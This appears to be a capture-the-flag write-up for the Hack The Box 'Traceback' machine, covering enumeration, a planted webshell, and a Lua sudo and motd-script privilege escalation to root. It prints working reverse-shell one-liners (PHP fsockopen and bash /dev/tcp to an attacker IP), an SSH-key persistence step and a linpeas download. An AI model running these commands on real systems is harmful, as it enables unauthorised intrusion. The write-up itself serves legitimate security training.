Cybersecurity Notes
MathematicsCryptography
  • Cybersecurity Notes
  • Binary Exploitation
    • Stack
      • Introduction
      • ret2win
      • De Bruijn Sequences
      • Shellcode
      • NOPs
      • 32- vs 64-bit
      • No eXecute
      • Return-Oriented Programming
        • Calling Conventions
        • Gadgets
        • Exploiting Calling Conventions
        • ret2libc
        • Stack Alignment
      • Format String Bug
      • Stack Canaries
      • PIE
        • Pwntools, PIE and ROP
        • PIE Bypass with Given Leak
        • PIE Bypass
      • ASLR
        • ASLR Bypass with Given Leak
        • PLT and GOT
        • ret2plt ASLR bypass
      • GOT Overwrite
        • Exploiting a GOT overwrite
      • RELRO
      • Reliable Shellcode
        • ROP and Shellcode
        • Using RSP
        • ret2reg
          • Using ret2reg
      • One Gadgets and Malloc Hook
      • Syscalls
        • Exploitation with Syscalls
        • Sigreturn-Oriented Programming (SROP)
          • Using SROP
      • ret2dlresolve
        • Exploitation
      • ret2csu
        • Exploitation
        • CSU Hardening
      • Exploiting over Sockets
        • Exploit
        • Socat
      • Forking Processes
      • Stack Pivoting
        • Exploitation
          • pop rsp
          • leave
    • Heap
      • Introduction to the Heap
      • Chunks
      • Freeing Chunks and the Bins
        • Operations of the Fastbin
        • Operations of the Other Bins
      • Malloc State
      • malloc_consolidate()
      • Heap Overflow
        • heap0
        • heap1
      • Use-After-Free
      • Double-Free
        • Double-Free Protections
        • Double-Free Exploit
      • Unlink Exploit
      • The Tcache
        • Tcache: calloc()
        • Tcache Poisoning
      • Tcache Keys
      • Safe Linking
    • Kernel
      • Introduction
      • Writing a Char Module
        • An Interactive Char Driver
        • Interactivity with IOCTL
      • A Basic Kernel Interaction Challenge
      • Compiling, Customising and booting the Kernel
      • Double-Fetch
        • Double-Fetch without Sleep
      • The Ultimate Aim of Kernel Exploitation - Process Credentials
      • Kernel ROP - ret2usr
      • Debugging a Kernel Module
      • SMEP
        • Kernel ROP - Disabling SMEP
        • Kernel ROP - Privilege Escalation in Kernel Space
      • SMAP
      • modprobe_path
      • KASLR
      • KPTI
    • Browser Exploitation
      • *CTF 2019 - oob-v8
        • The Challenge
      • picoCTF 2021 - Kit Engine
      • picoCTF 2021 - Download Horsepower
  • Reverse Engineering
    • Strings in C++
    • C++ Decompilation Tricks
    • Reverse Engineering ARM
  • Blockchain
    • An Introduction to Blockchain
  • Smart Contracts and Solidity
  • Hosting a Testnet and Deploying a Contract
  • Interacting with Python
  • Writeups
    • Hack The Box
      • Linux Machines
        • Easy
          • Traceback
        • Medium
          • Magic
          • UpDown
        • Hard
          • Intense
      • Challenges
        • Web
          • Looking Glass
          • Sanitize
          • Baby Auth
          • Baby Website Rick
        • Pwn
          • Dream Diary: Chapter 1
            • Unlink Exploit
            • Chunk Overlap
          • Ropme
    • picoGym
      • Cryptography
        • Mod 26
        • Mind Your Ps and Qs
        • Easy Peasy
        • The Numbers
        • New Caesar
        • Mini RSA
        • Dachshund Attacks
        • No Padding, No Problem
        • Easy1
        • 13
        • Caesar
        • Pixelated
        • Basic-Mod1
        • Basic-Mod2
        • Credstuff
        • morse-code
        • rail-fence
        • Substitution0
        • Substitution1
        • Substitution2
        • Transposition-Trial
        • Vigenere
        • HideToSee
    • CTFs
      • Fword CTF 2020
        • Binary Exploitation
          • Molotov
        • Reversing
          • XO
      • X-MAS CTF 2020
        • Pwn
          • Do I Know You?
          • Naughty
        • Web
          • PHP Master
      • HTB CyberSanta 2021
        • Crypto
          • Common Mistake
          • Missing Reindeer
          • Xmas Spirit
          • Meet Me Halfway
  • Miscellaneous
    • pwntools
      • Introduction
      • Processes and Communication
      • Logging and Context
      • Packing
      • ELF
      • ROP
    • scanf Bypasses
    • Challenges in Containers
    • Using Z3
    • Cross-Compiling for arm32
Powered by GitBook
On this page
  • Enumeration
  • HTTP
  • Foothold
  • User
  • Enumeration
  • Exploitation
  • Root
  • Getting SSH Access
  • Finding the Vulnerability
  • Exploitation

Was this helpful?

Export as PDF
  1. Writeups
  2. Hack The Box
  3. Linux Machines
  4. Easy

Traceback

Last updated 4 months ago

Was this helpful?

Enumeration

We start off with a full-port nmap to check running services (most of output truncated)

$ sudo nmap -sS -n -p- -A -oN full.nmp 10.10.10.181

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us

We see port 22 with SSH and port 80 with HTTP. Let's check the HTTP.

HTTP

We're greeted with a strange message:

It seems as if our job is to find the "backdoor" into the system. The source has nothing particularly interesting, except for a comment:

alfa3.php
alfav3.0.1.php
andela.php
bloodsecv4.php
by.php
c99ud.php
cmd.php
configkillerionkros.php
jspshell.jsp
mini.php
obfuscated-punknopass.php
punk-nopass.php
punkholic.php
r57.php
smevk.php
wso2.8.5.php
$ gobuster dir -u http://10.10.10.181/ -w wordlist.txt -t 50

===============================================================
/smevk.php (Status: 200)
===============================================================

It appears as if smevk.php is on the target! Let's head over to http://10.10.10.181/smevk.php and we what happens.

Foothold

The webshell looks horrible, but we have an Execute input where we can run commands. We can now use this to get an actual reverse shell.

First we use nc on a terminal to listen for incoming connections:

$ nc -nvlp 9001
$ php -r '$sock=fsockopen("10.10.14.21",9001);exec("/bin/sh -i <&3 >&3 2>&3");'

User

Enumeration

Now we have a foothold, let's check what's in our user's home directory. It appears to be a file called note.txt:

webadmin@traceback:/home/webadmin$ ls
note.txt

webadmin@traceback:/home/webadmin$ cat note.txt
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.

We have been left "a tool to practise Lua". As always, first thing we should do as a new user is check our permissions.

webadmin@traceback:/home/webadmin$ sudo -l
User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/sysadmin/luvit

We can run luvit as sysadmin! We can guess that luvit is the tool that runs Lua scripts. Because we can run it as sysadmin, if we create a Lua script that spawns a shell we will spawn with higher privileges.

Exploitation

os.execute("/bin/bash")

This is the command we want to run. We can simply use echo to create it:

webadmin@traceback:/home/webadmin$ echo 'os.execute("/bin/bash")' > privesc.lua

Now let's run it as sysadmin!

$ sudo -u sysadmin /home/sysadmin/luvit privesc.lua
$ whoami
sysadmin

You could also have done it in one line using the -e flag:

sudo -u sysadmin /home/sysadmin/luvit -e ‘os.execute(“/bin/bash”)’

We can now read user.txt!

sysadmin@traceback:/home/webadmin$ cat ~/user.txt
895...

Root

Firstly, we want to get a nice SSH shell. We can get this using SSH keys.

Getting SSH Access

First create the key pair:

$ ssh-keygen -f traceback

Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again:
[...]

I just hit Enter, meaning there's no passphrase. Now cat traceback.pub and echo it into ~/.ssh/authorized_keys - this registers the keypair as valid.

When using echo in these scenarios, use >> rather than >. Using only a single > will overwrite all the other contents, essentially erasing any keys owned by other people, which is not a great thing to do.

If ~/.ssh doesn't exist already, make sure you create it.

echo "<public key>" >> ~/.ssh/authorized_keys

Make sure you spell it authorized not authorised!

Now we can log in via SSH using

ssh -i traceback sysadmin@10.10.10.181

Finding the Vulnerability

$ sudo python3 -m http.server 80

The wget it on the box:

wget 10.10.14.21/linpeas.sh

Then chmod, run and analyse the output.

Something that really sticks out is this:

Exploitation

So the privesc is simple, but what should we get the file to do? There are a couple types of choices:

  • Run something that enables us to get root

  • Print the flag

In these situations, if both approaches are equivalently easy, then it's a good idea to go for the approach that affects the least other users. Nobody can notice our reverse shell since it's directly to our IP, so it doesn't affect other users.

echo -e '#!/bin/bash\nbash -i >& /dev/tcp/10.10.14.21/9002 0>&1' > 00-header

Make sure you set up an nc listener on port 9002 and then log in via SSH again.

$ nc -nvlp 9002
$ ssh -i traceback sysadmin@10.10.10.181

And bam, we have a root shell.

root@traceback:/# whoami
whoami
root

root@traceback:/# cat /root/root.txt
cat /root/root.txt
e68...

If we google this comment we come across an interesting with a collection of reverse shells. Let's put their names in a file called wordlist.txt and run gobuster:

It definitely exists! The tells us the default credentials are admin:admin.

Next we use a l on the webshell to redirect execution to it:

We get a connection! This is a fairly bad shell, but we can easily .

To perform some automated privesc recon, I'm going to run . Port it over by hosting it on a python SimpleHTPServer:

These scripts get run every time someone logs in with SSH. If we can modify them (which we can), they will run whatever we modify them to. The important part here is .

GitHub repo
repo
PHP reverse shel
upgrade it to be useful
linpeas
they get run as root
The Message
The Comment
The Webshell
Yes, it's pretty hideous
GROUP Writeable Files